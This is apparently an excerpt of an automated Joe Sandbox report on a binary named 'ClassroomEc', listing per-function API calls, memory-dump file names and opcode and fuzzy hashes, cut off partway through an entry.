                                                                                                                                                      control_flow_graph 1577 a73e20-a73e7e call a97720 call a86de0 call a74080 lstrlenA * 2 1583 a73e85-a73e8c 1577->1583 1584 a74072-a74075 1583->1584 1585 a73e92-a73e96 1583->1585 1586 a73ea1-a73eb3 call a738d0 1585->1586 1587 a73e98-a73e9f 1585->1587 1586->1584 1587->1586 1588 a73eb8-a73eeb call a86d10 1587->1588 1591 a73eed-a73eef 1588->1591 1592 a73ef1-a73ef8 1591->1592 1593 a73efa-a73efc 1591->1593 1592->1593 1594 a73f01-a73f10 1592->1594 1593->1584 1595 a73f1a-a73f21 1594->1595 1596 a73f27-a73f2d 1595->1596 1597 a74028-a7406d memmove 1595->1597 1598 a73f33-a73f42 1596->1598 1599 a73fb8-a73fc7 1596->1599 1597->1583 1602 a73f44 1598->1602 1603 a73f49-a73f69 memcmp 1598->1603 1600 a73fcb-a73feb memcmp 1599->1600 1601 a73fc9 1599->1601 1606 a74014-a7401d 1600->1606 1607 a73fed-a7400c 1600->1607 1601->1597 1602->1597 1604 a73f72-a73f8e 1603->1604 1605 a73f6b-a73f6d 1603->1605 1608 a73f97-a73fb6 call a740a0 1604->1608 1609 a73f90-a73f92 1604->1609 1605->1584 1612 a74023 1606->1612 1610 a74012 1607->1610 1611 a7400e 1607->1611 1608->1612 1609->1584 1610->1612 1611->1610 1612->1595
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$memcmpmemmove
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994076250-0
                                                                                                                                                      • Opcode ID: 316da79ca7f263f1c17a49bb85647f09c29c2c8284ec7c03d89f132c8a4b3057
                                                                                                                                                      • Instruction ID: 7ece3c32b378b772bb499c21fb7e3d2f17863b776971b1c36de43a5c45f825c2
                                                                                                                                                      • Opcode Fuzzy Hash: 316da79ca7f263f1c17a49bb85647f09c29c2c8284ec7c03d89f132c8a4b3057
                                                                                                                                                      • Instruction Fuzzy Hash: 95614871A002999BCF10CF98CD94BEEB7B5BB48380F10C199E999A7284D7B59B81DF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$FormatMessagelstrcpy$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                      • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                      • API String ID: 617470318-372238525
                                                                                                                                                      • Opcode ID: fb9bdc9020eb104d880ce1274a2aabe47252ce1a476b4fe69a12c87d67f2b422
                                                                                                                                                      • Instruction ID: 1f3eb6e50fe87785a379c0246d4293952db208d7819c43c3eda301e25455a1f9
                                                                                                                                                      • Opcode Fuzzy Hash: fb9bdc9020eb104d880ce1274a2aabe47252ce1a476b4fe69a12c87d67f2b422
                                                                                                                                                      • Instruction Fuzzy Hash: 05215CB5E00609ABDB04EF94DC92BEE77B4AF14704F50C558F5196A1C2EBB0AA18C7D1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetProcAddress.KERNEL32(75900000,GetNativeSystemInfo), ref: 00A76191
                                                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00A761A4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressInfoNativeProcSystem
                                                                                                                                                      • String ID: GetNativeSystemInfo
                                                                                                                                                      • API String ID: 2220751540-3949249589
                                                                                                                                                      • Opcode ID: 884ef408b6d39cefc2ac3173850accadcb0ab4a0a3f633dc9b0d903a93e9b641
                                                                                                                                                      • Instruction ID: 0ee09b28066b9d3121f9f795b07dc58707500564a61cf47f6f139f89046e535e
                                                                                                                                                      • Opcode Fuzzy Hash: 884ef408b6d39cefc2ac3173850accadcb0ab4a0a3f633dc9b0d903a93e9b641
                                                                                                                                                      • Instruction Fuzzy Hash: A8E08C30E01208EBCF04DBE88D0C6EEB7F8AB08301F10864AE805A3180EA349A84D761
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A723A4
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A72435
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7246C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 571936431-0
                                                                                                                                                      • Opcode ID: 4b675a789d6c5200897ced8ee72c9d0a13f9953e3552cd71daa220115c11cae9
                                                                                                                                                      • Instruction ID: 9934a606ad3f7553469dc4d222ad6450ecdc56b988605f76f815dae0ce66b03a
                                                                                                                                                      • Opcode Fuzzy Hash: 4b675a789d6c5200897ced8ee72c9d0a13f9953e3552cd71daa220115c11cae9
                                                                                                                                                      • Instruction Fuzzy Hash: F2310DB56002199BCB04DF95CD91AFF77B5BF54304F50C429F81AAB291EB34AD60CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@_wmemmove
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 328067375-0
                                                                                                                                                      • Opcode ID: 57640352dee917e0f3097d4ee9c6a7c98d6df61b4aaa9fea7e377f44341e8775
                                                                                                                                                      • Instruction ID: 4792df1586ecebb790b33bf324994375c68d30e7e59cc99f5873874efa63fd49
                                                                                                                                                      • Opcode Fuzzy Hash: 57640352dee917e0f3097d4ee9c6a7c98d6df61b4aaa9fea7e377f44341e8775
                                                                                                                                                      • Instruction Fuzzy Hash: E211A7F5E00109AFCF04DFA8D6819AEB7F5EF88300F248169E909A7355D631AE11DBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A736D5
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A736E1
                                                                                                                                                        • Part of subcall function 00A76500: ??2@YAPAXI@Z.MSVCRT ref: 00A7650B
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A73702
                                                                                                                                                        • Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap$??2@_wmemmove
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4287629685-0
                                                                                                                                                      • Opcode ID: 1625f688e1a68f23d55cc4acdc52d808743e648a361b7c9dd9ff3a70c490ed17
                                                                                                                                                      • Instruction ID: 83c020c0b048539fe2a30eebdeaafa6a6e4e35ea92f650baee33f7451004a65c
                                                                                                                                                      • Opcode Fuzzy Hash: 1625f688e1a68f23d55cc4acdc52d808743e648a361b7c9dd9ff3a70c490ed17
                                                                                                                                                      • Instruction Fuzzy Hash: 0001D2B6500108A7CF08FF94DD529EE77789F14304F40C168F51A66191EE716E44CBD1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 441bddb707248e6cce5ff5a3ab9b2333bba79eea8ee20f541bfbf5805f82cb8c
                                                                                                                                                      • Instruction ID: 4cf0748ca23313d31341d20a387197a6eaf190d1b535b521f27b0f94e0a10e86
                                                                                                                                                      • Opcode Fuzzy Hash: 441bddb707248e6cce5ff5a3ab9b2333bba79eea8ee20f541bfbf5805f82cb8c
                                                                                                                                                      • Instruction Fuzzy Hash: 66A12870E00208DFDB58EF98D991EEEB7B2BF44304F248519E405AB296D734AE49CF94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                      • Opcode ID: defd2acd29be71b7e68eca6921e8a119e3be9c7b6f103995e3c8b4bb43dafe3d
                                                                                                                                                      • Instruction ID: 909b9aac283e72997dccbaf0b3b236cfc859d5e84109f0f3e680e28bc26741c8
                                                                                                                                                      • Opcode Fuzzy Hash: defd2acd29be71b7e68eca6921e8a119e3be9c7b6f103995e3c8b4bb43dafe3d
                                                                                                                                                      • Instruction Fuzzy Hash: 24113674A04109EFDB08EF98D480EAE77B6AF48300F148199E8069B392D730EE41CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00A867E2
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A867F1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                      • Opcode ID: 46a2855e9e5e94d944f22cf64840e0e19d6423eb79600958f5955e03241eb4c2
                                                                                                                                                      • Instruction ID: 70637a76fd91459c9fdf794e08cbba2802f1114e1eafad3b8a0c76ef09384cfe
                                                                                                                                                      • Opcode Fuzzy Hash: 46a2855e9e5e94d944f22cf64840e0e19d6423eb79600958f5955e03241eb4c2
                                                                                                                                                      • Instruction Fuzzy Hash: 5F015E75A00218ABDB00EFA8D8959DFBBF5EF4C310F24C29AE815D7340DA309A41DBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 00A72FBA
                                                                                                                                                      • EndDialog.USER32(00000000,00000000), ref: 00A7301E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DialogSleep
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2355613043-0
                                                                                                                                                      • Opcode ID: 3793d2d6577c10e22fd55df8e165941e1e031364fddd368dbc7730e07993b532
                                                                                                                                                      • Instruction ID: b8ed7e205a0569d1dc840b82db649c14358a54396713eb9d7965f7d05a81292d
                                                                                                                                                      • Opcode Fuzzy Hash: 3793d2d6577c10e22fd55df8e165941e1e031364fddd368dbc7730e07993b532
                                                                                                                                                      • Instruction Fuzzy Hash: 16014071B00208EFDB14DFD8DC45BAAB7B5FB88304F10C15AE6155B290CB315A81DF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A768BC
                                                                                                                                                      • SetEnvironmentVariableW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00A768EC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugEnvironmentHeapVariable
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1617098807-0
                                                                                                                                                      • Opcode ID: 0662ec03c921832401e0ef58763b58fc3aa09a600361f5c81954b9c3f4f7d88a
                                                                                                                                                      • Instruction ID: 0bb90aa10c180baa90b5c22936447d4110c3e491b53d956e10634945a4613ec5
                                                                                                                                                      • Opcode Fuzzy Hash: 0662ec03c921832401e0ef58763b58fc3aa09a600361f5c81954b9c3f4f7d88a
                                                                                                                                                      • Instruction Fuzzy Hash: 050136B1E005099BCF04FBF8DE52ABEB3B9EB54304F50846DE41AA7252EE309F149756
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00A7E7ED
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00A7E88E
                                                                                                                                                        • Part of subcall function 00A89C10: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A89C1A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 879816989-0
                                                                                                                                                      • Opcode ID: b04ede186c28dc87f172cc442d6dd452132864e9b06f430d95c33cd111ea408d
                                                                                                                                                      • Instruction ID: 2d18795aba84ac666d74f18e6d31905eb11b523329f16105e631354ff5e25b0d
                                                                                                                                                      • Opcode Fuzzy Hash: b04ede186c28dc87f172cc442d6dd452132864e9b06f430d95c33cd111ea408d
                                                                                                                                                      • Instruction Fuzzy Hash: 4E42B070A002298FCB68DB14CD91BEDB7B5AF99304F14C1E9E54E67292DB306E85CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A765AE
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A765C0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 571936431-0
                                                                                                                                                      • Opcode ID: 9096d092ce5265a843bb9eddd4b7e6414a854e3b3cdacde1e655d6aff4fc1456
                                                                                                                                                      • Instruction ID: aa72c8a8420af8e76176b3218b96c588e43427ff728a28cddd6dd9e37b2ecf24
                                                                                                                                                      • Opcode Fuzzy Hash: 9096d092ce5265a843bb9eddd4b7e6414a854e3b3cdacde1e655d6aff4fc1456
                                                                                                                                                      • Instruction Fuzzy Hash: 08E04C7150410CABC708DB88D9A1AAEB7A9EB54744B108159F909A7341CA31AE109799
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A72268
                                                                                                                                                        • Part of subcall function 00A804F0: ??3@YAXPAX@Z.MSVCRT ref: 00A80505
                                                                                                                                                        • Part of subcall function 00A71E40: memset.MSVCRT ref: 00A71E5E
                                                                                                                                                        • Part of subcall function 00A71E40: _DebugHeapAllocator.LIBCPMTD ref: 00A71ED4
                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00A99730,?,?,?,00000000,?), ref: 00A722B7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap$??3@ErrorLastmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1417051094-0
                                                                                                                                                      • Opcode ID: 04fcd4cc385df91bb4f6ffd6f0165cd4f9899db3634c4a74d419441cad521c6b
                                                                                                                                                      • Instruction ID: a64113b63b72c6219dfdb65e13371602dcbea037904ac8f596c58a260f3a96a0
                                                                                                                                                      • Opcode Fuzzy Hash: 04fcd4cc385df91bb4f6ffd6f0165cd4f9899db3634c4a74d419441cad521c6b
                                                                                                                                                      • Instruction Fuzzy Hash: 7A114F71D10108AADB14FBA4EE52EEE777CAF54304F44C128B50AA6193EF349A19CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?), ref: 00A725C0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                      • Opcode ID: ef212935fbb909bb3ceb28c1a6ee1e8671c0314af6d419217deaca93ebccec91
                                                                                                                                                      • Instruction ID: d1d20ad9d0b7eeee8b99ad0b5a192da83040fd964562409b138ff6e7146d9120
                                                                                                                                                      • Opcode Fuzzy Hash: ef212935fbb909bb3ceb28c1a6ee1e8671c0314af6d419217deaca93ebccec91
                                                                                                                                                      • Instruction Fuzzy Hash: 3801F471200104ABDB08EF59DD64BAA37A5AF84345F44C419F90E8F752DB34E9D1CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: codecvt
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3662085145-0
                                                                                                                                                      • Opcode ID: 83591acb39805b45cadf740831f139ff59013fcdbe6ed1d7997e73483f31122d
